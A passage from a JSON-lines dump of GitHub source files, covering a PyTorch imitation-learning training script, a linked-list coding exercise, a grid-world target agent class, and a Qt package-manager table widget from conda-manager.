torch.tensor(x_train),\n torch.tensor(y_train))\n\n train_loader = torch.utils.data.DataLoader(train_set,\n batch_size=BATCH_SIZE,\n shuffle=True,\n num_workers=2)\n\n # test dataset\n x_val, y_val = x[int(len(x_train)):], y[int(len(y_train)):]\n\n val_set = TensorDatasetTransforms(\n torch.tensor(x_val),\n torch.tensor(y_val))\n\n val_loader = torch.utils.data.DataLoader(val_set,\n batch_size=BATCH_SIZE,\n shuffle=False,\n num_workers=2)\n\n return train_loader, val_loader\n\n\ndef build_network():\n \"\"\"Build the torch network\"\"\"\n\n class Flatten(nn.Module):\n \"\"\"\n Helper class to flatten the tensor\n between the last conv and first fc layer\n \"\"\"\n\n def forward(self, x):\n return x.view(x.size()[0], -1)\n\n # Same network as with the DQN example\n model = torch.nn.Sequential(\n torch.nn.Conv2d(1, 32, 8, 4),\n torch.nn.BatchNorm2d(32),\n torch.nn.ELU(),\n torch.nn.Dropout2d(0.5),\n torch.nn.Conv2d(32, 64, 4, 2),\n torch.nn.BatchNorm2d(64),\n torch.nn.ELU(),\n torch.nn.Dropout2d(0.5),\n torch.nn.Conv2d(64, 64, 3, 1),\n torch.nn.ELU(),\n Flatten(),\n torch.nn.BatchNorm1d(64 * 7 * 7),\n torch.nn.Dropout(),\n torch.nn.Linear(64 * 7 * 7, 120),\n torch.nn.ELU(),\n torch.nn.BatchNorm1d(120),\n torch.nn.Dropout(),\n torch.nn.Linear(120, len(available_actions)),\n )\n\n return model\n\n\ndef train(model, device):\n \"\"\"\n Training main method\n :param model: the network\n :param device: the cuda device\n \"\"\"\n\n loss_function = nn.CrossEntropyLoss()\n\n optimizer = optim.Adam(model.parameters())\n\n train_loader, val_order = create_datasets() # read datasets\n\n # train\n for epoch in range(EPOCHS):\n print('Epoch {}/{}'.format(epoch + 1, EPOCHS))\n\n train_epoch(model,\n device,\n loss_function,\n optimizer,\n train_loader)\n\n test(model, device, loss_function, val_order)\n\n # save model\n model_path = os.path.join(DATA_DIR, MODEL_FILE)\n torch.save(model.state_dict(), model_path)\n\n\ndef train_epoch(model, device, loss_function, optimizer, data_loader):\n \"\"\"Train for a single epoch\"\"\"\n\n # set model to training mode\n model.train()\n\n current_loss = 0.0\n current_acc = 0\n\n # iterate over the training data\n for i, (inputs, labels) in enumerate(data_loader):\n # send the input/labels to the GPU\n inputs = inputs.to(device)\n labels = labels.to(device)\n\n # zero the parameter gradients\n optimizer.zero_grad()\n\n with torch.set_grad_enabled(True):\n # forward\n outputs = model(inputs)\n _, predictions = torch.max(outputs, 1)\n loss = loss_function(outputs, labels)\n\n # backward\n loss.backward()\n optimizer.step()\n\n # statistics\n current_loss += loss.item() * inputs.size(0)\n current_acc += torch.sum(predictions == labels.data)\n\n total_loss = current_loss / len(data_loader.dataset)\n total_acc = current_acc.double() / len(data_loader.dataset)\n\n print('Train Loss: {:.4f}; Accuracy: {:.4f}'.format(total_loss, total_acc))\n\n\ndef test(model, device, loss_function, data_loader):\n \"\"\"Test over the whole dataset\"\"\"\n\n model.eval() # set model in evaluation mode\n\n current_loss = 0.0\n current_acc = 0\n\n # iterate over the validation data\n for i, (inputs, labels) in enumerate(data_loader):\n # send the input/labels to the GPU\n inputs = inputs.to(device)\n labels = labels.to(device)\n\n # forward\n with torch.set_grad_enabled(False):\n outputs = model(inputs)\n _, predictions = torch.max(outputs, 1)\n loss = loss_function(outputs, labels)\n\n # statistics\n current_loss += loss.item() * inputs.size(0)\n current_acc += torch.sum(predictions == labels.data)\n\n total_loss = current_loss / len(data_loader.dataset)\n total_acc = current_acc.double() / len(data_loader.dataset)\n\n print('Test Loss: {:.4f}; Accuracy: {:.4f}'\n .format(total_loss, total_acc))\n\n\nif __name__ == '__main__':\n dev = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n m = build_network()\n\n if restore:\n model_path = os.path.join(DATA_DIR, MODEL_FILE)\n m.load_state_dict(torch.load(model_path))\n\n m.eval()\n m = m.to(dev)\n train(m, dev)\n","repo_name":"PacktPublishing/Python-Deep-Learning-Second-Edition","sub_path":"Chapter10/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":7931,"program_lang":"python","lang":"en","doc_type":"code","stars":114,"dataset":"github-code","pt":"37"} +{"seq_id":"18046021839","text":"# Definition for singly-linked list.\n# class ListNode(object):\n# def __init__(self, val=0, next=None):\n# self.val = val\n# self.next = next\nclass Solution(object):\n def getArrayForm(self,head):\n \n if head==None:\n return []\n ar=[]\n temp=head\n while(temp!=None):\n ar.append(temp.val)\n temp=temp.next\n return ar\n \n def removeNthFromEnd(self, head, n):\n \"\"\"\n :type head: ListNode\n :type n: int\n :rtype: ListNode\n \"\"\"\n if head==None:\n return head\n \n ar= self.getArrayForm(head)\n size=len(ar)\n ar.pop(size-n)\n print(ar)\n if len(ar)<1:\n return None\n \n head=ListNode(ar[0])\n temp=head\n prev=head\n if len(ar)==1:\n \n head.next=None\n return head\n \n i=1\n while(i 0:\n\t\t\tself.face = 0 # east\n\t\telif self.x - self.lastX < 0:\n\t\t\tself.face = 180 # west\n\t\telse:\n\t\t\tif self.y - self.lastY >0:\n\t\t\t\tself.face = 270 # south\n\t\t\telse:\n\t\t\t\tself.face = 90 # north\n\n\tdef preferenceMove(self,grids_x,grids_y):\n\t\t# until find a valid move\n\t\twhile True:\n\t\t\t# random chance that target change face direction\n\t\t\tif randint(1,10) == 0:\n\t\t\t\tself.moveFace()\n\t\t\t\tbreak\n\t\t\t# random chance to move\n\t\t\t# moveX,moveY = randint(-1,1),randint(-1,1)\n\t\t\tmoveX,moveY = random.choice([(1,0),(0,1),(0,-1)])\n\t\t\tnewX,newY = self.x+moveX,self.y+moveY\n\t\t\t# check boundary (never walk along the boundary, at least one block away from boundary)\n\t\t\tif (newX>=1 and newX<=grids_x-2) and (newY>=1 and newY<=grids_y-2):\n\t\t\t\tself.walk(newX, newY)\n\t\t\t\tbreak\n\t\treturn (moveX,moveY)\n\n\t# target decide to move or look around at still\n\tdef randmove(self,grids_x,grids_y):\n\t\t# until find a valid move\n\t\twhile True:\n\t\t\t# random chance that target change face direction\n\t\t\tif randint(1,10) == 0:\n\t\t\t\tself.moveFace()\n\t\t\t\tbreak\n\t\t\t# random chance to move\n\t\t\t# moveX,moveY = randint(-1,1),randint(-1,1)\n\t\t\tmoveX,moveY = random.choice([(1,0),(-1,0),(0,1),(0,-1)])\n\t\t\tnewX,newY = self.x+moveX,self.y+moveY\n\t\t\t# check boundary (never walk along the boundary, at least one block away from boundary)\n\t\t\tif (newX>=1 and newX<=grids_x-2) and (newY>=1 and newY<=grids_y-2):\n\t\t\t\tself.walk(newX, newY)\n\t\t\t\tbreak\n\t\treturn (moveX,moveY)\n\n\tdef move(self,grids_x,grids_y):\n\t\tif self.randMove:\n\t\t\treturn self.randmove(grids_x,grids_y)\n\t\telse:\n\t\t\treturn self.preferenceMove(grids_x,grids_y)\n\n\t# according to input location of targey (x,y), return reward\n\tdef computeRewardMatrix(self):\n\t\tx, y = self.x, self.y\n\t\tface,faceAngle = self.face, self.faceAngle\n\t\tsize = 2*self.rewardRange+1\n\t\t# rewardMatrix = [ [0 for x in range(size)] for y in range(size)]\n\t\tfaceDirection = face + faceAngle\n\t\tfaceDirection = (faceDirection+360) % 360\n\t\tself.rewardMatrix[0] = self.rewardMatrix[0] % 360\n\t\t# rotate to correct direction\n\t\twhile self.rewardMatrix[0]%360 != faceDirection:\n\t\t\tself.rewardMatrix[1] = np.rot90( self.rewardMatrix[1])\n\t\t\tself.rewardMatrix[0] += 90\n\n\t# return reward of a specific location\n\tdef getReward(self,x,y):\n\t\tif not self.isReward(x,y):\n\t\t\treturn 0\n\t\trelative_x = x-self.x + self.rewardRange\n\t\trelative_y = y-self.y + self.rewardRange \n\t\treturn self.rewardMatrix[1][relative_y][relative_x]\n\t\t\n\t# whether the input location is be rewarded\n\tdef isReward(self,x,y):\n\t\tdiff_x = self.x - x\n\t\tdiff_y = self.y - y\n\t\tif abs(diff_x)>self.rewardRange or abs(diff_y)>self.rewardRange :\n\t\t\treturn False\n\t\treturn True\n\n\tdef possibleActions(self,GRIDS_X,GRIDS_Y):\n\t\tactions = []\n\n\t\tif self.x < GRIDS_X-1:\n\t\t\tactions.append('east')\n\t\tif self.x > 0:\n\t\t\tactions.append('west')\n\t\tif self.y < GRIDS_Y-1:\n\t\t\tactions.append('south')\n\t\tif self.y > 0:\n\t\t\tactions.append('north')\n\n\t\treturn actions\n\t\n\tdef backUp(self):\n\t\tself.backX, self.bakcY = self.x, self.y\n\t\tself.backLx, self.backLy = self.lastX, self.lastY\n\t\tself.backF, self.backLF = self.face, self.lastFace\n\t\tself.backFA, self.backLFA = self.faceAngle, self.lastFaceAngle\n\n\tdef recoverBackUp(self):\n\t\tself.x, self.y = self.backX, self.bakcY\n\t\tself.lastX, self.lastY = self.backLx, self.backLy\n\t\tself.face, self.lastFace = self.backF, self.backLF\n\t\tself.faceAngle, self.lastFaceAngle = self.backFA, self.backLFA\n\n\tdef AImove(self,action):\n\t\tself.lastX,self.lastY= self.x,self.y\n\t\tself.lastFace, self.lastFaceAngle = self.face, self.faceAngle\n\n\t\tif action == 'east':\n\t\t\tself.x += 1\n\t\telif action == 'west':\n\t\t\tself.x -= 1\n\t\telif action == 'north':\n\t\t\tself.y -= 1\n\t\telif action == 'south':\n\t\t\tself.y += 1\n\t\telse:\n\t\t\tNone\n\t\tif self.x - self.lastX > 0:\n\t\t\tself.face = 0 # east\n\t\telif self.x - self.lastX < 0:\n\t\t\tself.face = 180 # west\n\t\telse:\n\t\t\tif self.y - self.lastY >0:\n\t\t\t\tself.face = 270 # south\n\t\t\telse:\n\t\t\t\tself.face = 90 # north\n\t\t\t\t\n\n\tdef undo(self):\n\t\tself.x = self.lastX\n\t\tself.y = self.lastY\n\t\tself.faceAngle = self.lastFaceAngle\n\t\tself.face = self.lastFace\n\t\tself.computeRewardMatrix()\n\n# agent = Target(1,3)\n# print agent.rewardMatrix\n# print (agent.x, agent.y, agent.face, agent.faceAngle)\n# print 'move-------------'\n# agent.randmove(20,20)\n# print (agent.lastX, agent.lastY, agent.lastFace, agent.lastFaceAngle)\n# print (agent.x, agent.y, agent.face, agent.faceAngle)\n# agent.computeRewardMatrix(agent.x, agent.y, agent.face, agent.faceAngle)\n# print agent.rewardMatrix\n# print 'move-------------'\n# agent.randmove(20,20)\n# print (agent.lastX, agent.lastY, agent.lastFace, agent.lastFaceAngle)\n# print (agent.x, agent.y, agent.face, agent.faceAngle)\n# agent.computeRewardMatrix(agent.x, agent.y, agent.face, agent.faceAngle)\n# print agent.rewardMatrix\n\n\n\n\n","repo_name":"GnawXam/cs221_ai_final_project","sub_path":"target.py","file_name":"target.py","file_ext":"py","file_size_in_byte":6477,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"39032828931","text":"from __future__ import (division, print_function, unicode_literals,\n with_statement)\n\n# Standard library imports\nimport gettext\n\n# Third party imports\nfrom qtpy import PYQT5\nfrom qtpy.QtCore import Qt, QPoint, QSize, QUrl, Signal, QEvent\nfrom qtpy.QtGui import QColor, QDesktopServices, QIcon, QPen, QBrush\nfrom qtpy.QtWidgets import (QAbstractItemView, QItemDelegate, QMenu,\n QTableView)\n\n# Local imports\nfrom conda_manager.models.filter import MultiColumnSortFilterProxy\nfrom conda_manager.models.packages import CondaPackagesModel\nfrom conda_manager.utils import get_image_path\nfrom conda_manager.utils import constants as const\nfrom conda_manager.utils.py3compat import to_text_string\nfrom conda_manager.utils.qthelpers import add_actions, create_action\n\n\n_ = gettext.gettext\nHIDE_COLUMNS = [const.COL_START, const.COL_STATUS, const.COL_URL,\n const.COL_LICENSE, const.COL_REMOVE, const.COL_ACTION_VERSION,\n const.COL_END]\n\n\nclass CustomDelegate(QItemDelegate):\n pass\n# def paint(self, painter, option, index):\n# QItemDelegate.paint(self, painter, option, index)\n# column = index.column()\n# row = index.row()\n# rect = option.rect\n#\n# # Draw borders\n# pen = QPen()\n# pen.setWidth(1)\n# pen.setColor(QColor('#cdcdcd'))\n# painter.setPen(pen)\n# painter.drawLine(rect.topLeft(), rect.topRight())\n#\n# if (row == self.current_hover_row() or row == self.current_row() and\n# (self.has_focus_or_context())):\n# brush = QBrush(Qt.SolidPattern)\n# brush.setColor(QColor(255, 255, 255, 100))\n# painter.fillRect(rect, brush)\n# if row == self.current_row() and column in [const.COL_START]:\n# pen = QPen()\n# pen.setWidth(10)\n# pen.setColor(QColor('#7cbb4c'))\n# painter.setPen(pen)\n# dyt = QPoint(0, 5)\n# dyb = QPoint(0, 4)\n# painter.drawLine(rect.bottomLeft()-dyb, rect.topLeft()+dyt)\n#\n# def sizeHint(self, style, model_index):\n# column = model_index.column()\n# if column in [const.COL_PACKAGE_TYPE] + [const.ACTION_COLUMNS,\n# const.COL_PACKAGE_TYPE]:\n# return QSize(24, 24)\n# else:\n# return QItemDelegate.sizeHint(self, style, model_index)\n\n\nclass TableCondaPackages(QTableView):\n \"\"\" \"\"\"\n WIDTH_TYPE = 24\n WIDTH_NAME = 120\n WIDTH_ACTIONS = 24\n WIDTH_VERSION = 90\n\n sig_status_updated = Signal(str, bool, list, bool)\n sig_conda_action_requested = Signal(str, int, str, object, object)\n sig_pip_action_requested = Signal(str, int)\n sig_actions_updated = Signal(int)\n sig_next_focus = Signal()\n sig_previous_focus = Signal()\n\n def __init__(self, parent):\n super(TableCondaPackages, self).__init__(parent)\n self._parent = parent\n self._searchbox = u''\n self._filterbox = const.ALL\n self._delegate = CustomDelegate(self)\n self.row_count = None\n self._advanced_mode = True\n self._current_hover_row = None\n self._menu = None\n self._palette = {}\n\n # To manage icon states\n self._model_index_clicked = None\n self.valid = False\n self.column_ = None\n self.current_index = None\n\n # To prevent triggering the keyrelease after closing a dialog\n # but hititng enter on it\n self.pressed_here = False\n\n self.source_model = None\n self.proxy_model = None\n\n self.setSelectionBehavior(QAbstractItemView.SelectRows)\n self.setSelectionMode(QAbstractItemView.SingleSelection)\n self.verticalHeader().hide()\n self.setSortingEnabled(True)\n self.setMouseTracking(True)\n\n self.setAlternatingRowColors(True)\n self._delegate.current_row = self.current_row\n self._delegate.current_hover_row = self.current_hover_row\n self._delegate.update_index = self.update\n self._delegate.has_focus_or_context = self.has_focus_or_context\n self.setItemDelegate(self._delegate)\n self.setShowGrid(False)\n self.setWordWrap(True)\n self.setHorizontalScrollBarPolicy(Qt.ScrollBarAlwaysOff)\n self.horizontalHeader().setStretchLastSection(True)\n\n # Header setup\n self._hheader = self.horizontalHeader()\n if PYQT5:\n self._hheader.setSectionResizeMode(self._hheader.Fixed)\n else:\n self._hheader.setResizeMode(self._hheader.Fixed)\n# self._hheader.setStyleSheet(\"\"\"QHeaderView {border: 0px;\n# border-radius: 0px;};\n# \"\"\")\n self.sortByColumn(const.COL_NAME, Qt.AscendingOrder)\n self.setContextMenuPolicy(Qt.CustomContextMenu)\n self.hide_columns()\n\n def setup_model(self, packages, data, metadata_links={}):\n \"\"\" \"\"\"\n self.proxy_model = MultiColumnSortFilterProxy(self)\n self.source_model = CondaPackagesModel(self, packages, data)\n self.proxy_model.setSourceModel(self.source_model)\n self.setModel(self.proxy_model)\n self.metadata_links = metadata_links\n\n # FIXME: packages sizes... move to a better place?\n packages_sizes = {}\n for name in packages:\n packages_sizes[name] = packages[name].get('size')\n self._packages_sizes = packages_sizes\n\n # Custom Proxy Model setup\n self.proxy_model.setDynamicSortFilter(True)\n\n filter_text = \\\n (lambda row, text, status: (\n all([t in row[const.COL_NAME].lower() for t in\n to_text_string(text).lower().split()]) or\n all([t in row[const.COL_DESCRIPTION].lower() for t in\n to_text_string(text).split()])))\n\n filter_status = (lambda row, text, status:\n to_text_string(row[const.COL_STATUS]) in\n to_text_string(status))\n self.model().add_filter_function('status-search', filter_status)\n self.model().add_filter_function('text-search', filter_text)\n\n # Signals and slots\n self.verticalScrollBar().valueChanged.connect(self.resize_rows)\n\n self.hide_columns()\n self.resize_rows()\n self.refresh_actions()\n self.source_model.update_style_palette(self._palette)\n\n def update_style_palette(self, palette={}):\n self._palette = palette\n\n def resize_rows(self):\n \"\"\" \"\"\"\n delta_y = 10\n height = self.height()\n y = 0\n while y < height:\n row = self.rowAt(y)\n self.resizeRowToContents(row)\n row_height = self.rowHeight(row)\n self.setRowHeight(row, row_height + delta_y)\n y += self.rowHeight(row) + delta_y\n\n def hide_columns(self):\n \"\"\" \"\"\"\n for col in const.COLUMNS:\n self.showColumn(col)\n\n hide = HIDE_COLUMNS\n if self._advanced_mode:\n columns = const.ACTION_COLUMNS[:]\n columns.remove(const.COL_ACTION)\n hide += columns\n else:\n hide += [const.COL_ACTION]\n\n for col in hide:\n self.hideColumn(col)\n\n def filter_changed(self):\n \"\"\"Trigger the filter\"\"\"\n group = self._filterbox\n text = self._searchbox\n\n if group in [const.ALL]:\n group = ''.join([to_text_string(const.INSTALLED),\n to_text_string(const.UPGRADABLE),\n to_text_string(const.NOT_INSTALLED),\n to_text_string(const.DOWNGRADABLE),\n to_text_string(const.MIXGRADABLE)])\n elif group in [const.INSTALLED]:\n group = ''.join([to_text_string(const.INSTALLED),\n to_text_string(const.UPGRADABLE),\n to_text_string(const.DOWNGRADABLE),\n to_text_string(const.MIXGRADABLE)])\n elif group in [const.UPGRADABLE]:\n group = ''.join([to_text_string(const.UPGRADABLE),\n to_text_string(const.MIXGRADABLE)])\n elif group in [const.DOWNGRADABLE]:\n group = ''.join([to_text_string(const.DOWNGRADABLE),\n to_text_string(const.MIXGRADABLE)])\n else:\n group = to_text_string(group)\n\n if self.proxy_model is not None:\n self.proxy_model.set_filter(text, group)\n self.resize_rows()\n\n # Update label count\n count = self.verticalHeader().count()\n if count == 0:\n count_text = _(\"0 packages available \")\n elif count == 1:\n count_text = _(\"1 package available \")\n elif count > 1:\n count_text = to_text_string(count) + _(\" packages available \")\n\n if text != '':\n count_text = count_text + _('matching \"{0}\"').format(text)\n\n self.sig_status_updated.emit(count_text, False, [0, 0], True)\n\n def search_string_changed(self, text):\n \"\"\" \"\"\"\n text = to_text_string(text)\n self._searchbox = text\n self.filter_changed()\n\n def filter_status_changed(self, text):\n \"\"\" \"\"\"\n if text not in const.PACKAGE_STATUS:\n text = const.PACKAGE_STATUS[text]\n\n for key in const.COMBOBOX_VALUES:\n val = const.COMBOBOX_VALUES[key]\n if to_text_string(val) == to_text_string(text):\n group = val\n break\n self._filterbox = group\n self.filter_changed()\n\n def resizeEvent(self, event):\n \"\"\"Override Qt method\"\"\"\n w = self.width()\n width_start = 20\n width_end = width_start\n\n if self._advanced_mode:\n action_cols = [const.COL_ACTION]\n else:\n action_cols = [const.COL_UPGRADE, const.COL_INSTALL,\n const.COL_REMOVE, const.COL_DOWNGRADE]\n\n self.setColumnWidth(const.COL_START, width_start)\n self.setColumnWidth(const.COL_PACKAGE_TYPE, self.WIDTH_TYPE)\n self.setColumnWidth(const.COL_NAME, self.WIDTH_NAME)\n self.setColumnWidth(const.COL_VERSION, self.WIDTH_VERSION)\n w_new = w - (width_start + self.WIDTH_ACTIONS + self.WIDTH_TYPE +\n self.WIDTH_NAME + self.WIDTH_VERSION +\n (len(action_cols))*self.WIDTH_ACTIONS + width_end)\n self.setColumnWidth(const.COL_DESCRIPTION, w_new)\n self.setColumnWidth(const.COL_END, width_end)\n\n for col in action_cols:\n self.setColumnWidth(col, self.WIDTH_ACTIONS)\n QTableView.resizeEvent(self, event)\n self.resize_rows()\n\n def update_visible_rows(self):\n current_index = self.currentIndex()\n row = current_index.row()\n\n if self.proxy_model:\n for r in range(row - 50, row + 50):\n for co in const.COLUMNS:\n index = self.proxy_model.index(r, co)\n self.update(index)\n self.resize_rows()\n\n def current_row(self):\n\n if self._menu and self._menu.isVisible():\n return self.currentIndex().row()\n elif self.hasFocus():\n return self.currentIndex().row()\n else:\n return -1\n\n def current_hover_row(self):\n return self._current_hover_row\n\n def has_focus_or_context(self):\n return self.hasFocus() or (self._menu and self._menu.isVisible())\n\n def mouseMoveEvent(self, event):\n super(TableCondaPackages, self).mouseMoveEvent(event)\n pos = event.pos()\n self._current_hover_row = self.rowAt(pos.y())\n\n def leaveEvent(self, event):\n super(TableCondaPackages, self).leaveEvent(event)\n self._current_hover_row = None\n\n def keyPressEvent(self, event):\n \"\"\"\n Override Qt method.\n \"\"\"\n index = self.currentIndex()\n key = event.key()\n if key in [Qt.Key_Enter, Qt.Key_Return]:\n # self.action_pressed(index)\n self.setCurrentIndex(self.proxy_model.index(index.row(),\n const.COL_ACTION))\n self.pressed_here = True\n elif key in [Qt.Key_Tab]:\n new_row = index.row() + 1\n if not self.proxy_model or new_row == self.proxy_model.rowCount():\n self.sig_next_focus.emit()\n else:\n new_index = self.proxy_model.index(new_row, 0)\n self.setCurrentIndex(new_index)\n elif key in [Qt.Key_Backtab]:\n new_row = index.row() - 1\n if new_row < 0:\n self.sig_previous_focus.emit()\n else:\n new_index = self.proxy_model.index(new_row, 0)\n self.setCurrentIndex(new_index)\n else:\n QTableView.keyPressEvent(self, event)\n\n self.update_visible_rows()\n\n def keyReleaseEvent(self, event):\n \"\"\"Override Qt method\"\"\"\n QTableView.keyReleaseEvent(self, event)\n key = event.key()\n index = self.currentIndex()\n if key in [Qt.Key_Enter, Qt.Key_Return] and self.pressed_here:\n self.context_menu_requested(event)\n# self.action_released()\n elif key in [Qt.Key_Menu]:\n self.setCurrentIndex(self.proxy_model.index(index.row(),\n const.COL_ACTION))\n self.context_menu_requested(event, right_click=True)\n self.pressed_here = False\n self.update_visible_rows()\n\n def mousePressEvent(self, event):\n \"\"\"Override Qt method\"\"\"\n QTableView.mousePressEvent(self, event)\n self.current_index = self.currentIndex()\n column = self.current_index.column()\n\n if event.button() == Qt.LeftButton and column == const.COL_ACTION:\n pos = QPoint(event.x(), event.y())\n index = self.indexAt(pos)\n self.action_pressed(index)\n self.context_menu_requested(event)\n elif event.button() == Qt.RightButton:\n self.context_menu_requested(event, right_click=True)\n self.update_visible_rows()\n\n def mouseReleaseEvent(self, event):\n \"\"\"Override Qt method\"\"\"\n if event.button() == Qt.LeftButton:\n self.action_released()\n self.update_visible_rows()\n\n def action_pressed(self, index):\n \"\"\"\n DEPRECATED\n \"\"\"\n column = index.column()\n\n if self.proxy_model is not None:\n model_index = self.proxy_model.mapToSource(index)\n model = self.source_model\n\n self._model_index_clicked = model_index\n self.valid = True\n\n if (column == const.COL_INSTALL and\n model.is_installable(model_index)):\n model.update_row_icon(model_index.row(), const.COL_INSTALL)\n\n elif (column == const.COL_INSTALL and\n model.is_removable(model_index)):\n model.update_row_icon(model_index.row(), const.COL_REMOVE)\n\n elif ((column == const.COL_UPGRADE and\n model.is_upgradable(model_index)) or\n (column == const.COL_DOWNGRADE and\n model.is_downgradable(model_index))):\n model.update_row_icon(model_index.row(), model_index.column())\n\n else:\n self._model_index_clicked = None\n self.valid = False\n\n def action_released(self):\n \"\"\"\n DEPRECATED\n \"\"\"\n model = self.source_model\n model_index = self._model_index_clicked\n\n actions = {const.COL_INSTALL: const.ACTION_INSTALL,\n const.COL_REMOVE: const.ACTION_REMOVE,\n const.COL_UPGRADE: const.ACTION_UPGRADE,\n const.COL_DOWNGRADE: const.ACTION_DOWNGRADE,\n }\n\n if model_index:\n column = model_index.column()\n\n if column == const.COL_INSTALL and model.is_removable(model_index):\n column = const.COL_REMOVE\n self.source_model.update_row_icon(model_index.row(), column)\n\n if self.valid:\n row_data = self.source_model.row(model_index.row())\n type_ = row_data[const.COL_PACKAGE_TYPE]\n name = row_data[const.COL_NAME]\n version = self.source_model.get_package_version(name)\n versions = self.source_model.get_package_versions(name)\n\n if not versions:\n versions = [version]\n\n action = actions.get(column, None)\n\n if type_ == const.CONDA_PACKAGE:\n self.sig_conda_action_requested.emit(name, action, version,\n versions,\n self._packages_sizes)\n elif type_ == const.PIP_PACKAGE:\n self.sig_pip_action_requested.emit(name, action)\n else:\n pass\n\n def set_advanced_mode(self, value=True):\n self._advanced_mode = value\n# self.resizeEvent(None)\n\n def set_action_status(self, model_index, status=const.ACTION_NONE,\n version=None):\n self.source_model.set_action_status(model_index, status, version)\n self.refresh_actions()\n\n def context_menu_requested(self, event, right_click=False):\n \"\"\"\n Custom context menu.\n \"\"\"\n if self.proxy_model is None:\n return\n\n self._menu = QMenu(self)\n index = self.currentIndex()\n model_index = self.proxy_model.mapToSource(index)\n row_data = self.source_model.row(model_index.row())\n column = model_index.column()\n name = row_data[const.COL_NAME]\n # package_type = row_data[const.COL_PACKAGE_TYPE]\n versions = self.source_model.get_package_versions(name)\n current_version = self.source_model.get_package_version(name)\n\n# if column in [const.COL_ACTION, const.COL_VERSION, const.COL_NAME]:\n if column in [const.COL_ACTION] and not right_click:\n is_installable = self.source_model.is_installable(model_index)\n is_removable = self.source_model.is_removable(model_index)\n is_upgradable = self.source_model.is_upgradable(model_index)\n\n action_status = self.source_model.action_status(model_index)\n actions = []\n action_unmark = create_action(\n self,\n _('Unmark'),\n triggered=lambda: self.set_action_status(model_index,\n const.ACTION_NONE,\n current_version))\n action_install = create_action(\n self,\n _('Mark for installation'),\n triggered=lambda: self.set_action_status(model_index,\n const.ACTION_INSTALL,\n versions[-1]))\n action_upgrade = create_action(\n self,\n _('Mark for upgrade'),\n triggered=lambda: self.set_action_status(model_index,\n const.ACTION_UPGRADE,\n versions[-1]))\n action_remove = create_action(\n self,\n _('Mark for removal'),\n triggered=lambda: self.set_action_status(model_index,\n const.ACTION_REMOVE,\n current_version))\n\n version_actions = []\n for version in reversed(versions):\n def trigger(model_index=model_index,\n action=const.ACTION_INSTALL,\n version=version):\n return lambda: self.set_action_status(model_index,\n status=action,\n version=version)\n if version == current_version:\n version_action = create_action(\n self,\n version,\n icon=QIcon(),\n triggered=trigger(model_index,\n const.ACTION_INSTALL,\n version))\n if not is_installable:\n version_action.setCheckable(True)\n version_action.setChecked(True)\n version_action.setDisabled(True)\n elif version != current_version:\n if ((version in versions and versions.index(version)) >\n (current_version in versions and\n versions.index(current_version))):\n upgrade_or_downgrade_action = const.ACTION_UPGRADE\n else:\n upgrade_or_downgrade_action = const.ACTION_DOWNGRADE\n\n if is_installable:\n upgrade_or_downgrade_action = const.ACTION_INSTALL\n\n version_action = create_action(\n self,\n version,\n icon=QIcon(),\n triggered=trigger(model_index,\n upgrade_or_downgrade_action,\n version))\n\n version_actions.append(version_action)\n\n install_versions_menu = QMenu('Mark for specific version '\n 'installation', self)\n add_actions(install_versions_menu, version_actions)\n actions = [action_unmark, action_install, action_upgrade,\n action_remove]\n actions += [None, install_versions_menu]\n install_versions_menu.setEnabled(len(version_actions) > 1)\n\n if action_status is const.ACTION_NONE:\n action_unmark.setDisabled(True)\n action_install.setDisabled(not is_installable)\n action_upgrade.setDisabled(not is_upgradable)\n action_remove.setDisabled(not is_removable)\n install_versions_menu.setDisabled(False)\n else:\n action_unmark.setDisabled(False)\n action_install.setDisabled(True)\n action_upgrade.setDisabled(True)\n action_remove.setDisabled(True)\n install_versions_menu.setDisabled(True)\n\n elif right_click:\n license_ = row_data[const.COL_LICENSE]\n\n metadata = self.metadata_links.get(name, {})\n pypi = metadata.get('pypi', '')\n home = metadata.get('home', '')\n dev = metadata.get('dev', '')\n docs = metadata.get('docs', '')\n\n q_pypi = QIcon(get_image_path('python.png'))\n q_home = QIcon(get_image_path('home.png'))\n q_docs = QIcon(get_image_path('conda_docs.png'))\n\n if 'git' in dev:\n q_dev = QIcon(get_image_path('conda_github.png'))\n elif 'bitbucket' in dev:\n q_dev = QIcon(get_image_path('conda_bitbucket.png'))\n else:\n q_dev = QIcon()\n\n if 'mit' in license_.lower():\n lic = 'http://opensource.org/licenses/MIT'\n elif 'bsd' == license_.lower():\n lic = 'http://opensource.org/licenses/BSD-3-Clause'\n else:\n lic = None\n\n actions = []\n\n if license_ != '':\n actions.append(create_action(self, _('License: ' + license_),\n icon=QIcon(), triggered=lambda:\n self.open_url(lic)))\n actions.append(None)\n\n if pypi != '':\n actions.append(create_action(self, _('Python Package Index'),\n icon=q_pypi, triggered=lambda:\n self.open_url(pypi)))\n if home != '':\n actions.append(create_action(self, _('Homepage'),\n icon=q_home, triggered=lambda:\n self.open_url(home)))\n if docs != '':\n actions.append(create_action(self, _('Documentation'),\n icon=q_docs, triggered=lambda:\n self.open_url(docs)))\n if dev != '':\n actions.append(create_action(self, _('Development'),\n icon=q_dev, triggered=lambda:\n self.open_url(dev)))\n if actions and len(actions) > 1:\n # self._menu = QMenu(self)\n add_actions(self._menu, actions)\n\n if event.type() == QEvent.KeyRelease:\n rect = self.visualRect(index)\n global_pos = self.viewport().mapToGlobal(rect.bottomRight())\n else:\n pos = QPoint(event.x(), event.y())\n global_pos = self.viewport().mapToGlobal(pos)\n\n self._menu.popup(global_pos)\n\n def get_actions(self):\n if self.source_model:\n return self.source_model.get_actions()\n\n def clear_actions(self):\n index = self.currentIndex()\n if self.source_model:\n self.source_model.clear_actions()\n self.refresh_actions()\n self.setFocus()\n self.setCurrentIndex(index)\n\n def refresh_actions(self):\n if self.source_model:\n actions_per_package_type = self.source_model.get_actions()\n number_of_actions = 0\n for type_ in actions_per_package_type:\n actions = actions_per_package_type[type_]\n for key in actions:\n data = actions[key]\n number_of_actions += len(data)\n self.sig_actions_updated.emit(number_of_actions)\n\n def open_url(self, url):\n \"\"\"\n Open link from action in default operating system browser.\n \"\"\"\n if url is None:\n return\n QDesktopServices.openUrl(QUrl(url))\n","repo_name":"spyder-ide/conda-manager","sub_path":"conda_manager/widgets/table.py","file_name":"table.py","file_ext":"py","file_size_in_byte":26653,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"37"} +{"seq_id":"2149587951","text":"class Car:\n\n def __init__(self, 